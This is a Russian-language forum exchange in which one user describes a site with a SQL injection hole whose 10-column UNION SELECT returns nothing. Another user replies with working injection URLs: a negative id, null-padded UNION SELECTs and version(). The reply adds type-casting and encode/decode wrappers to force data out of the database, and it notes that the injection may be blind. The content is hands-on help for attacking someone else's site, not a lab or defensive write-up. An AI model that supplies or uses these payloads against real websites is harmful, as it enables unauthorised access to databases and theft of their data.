Сообщение от
KREGI
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...
Попробуй так
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
Возможные варианты:
- не соответствует кодировка или тип данных.
Тогда, пользуйся функциями приведения типов
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
cast(version()+as+binary)
cast(version()+as+int)
cast(version()+as+char)
и тд.
Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.
- у скули нету вывода.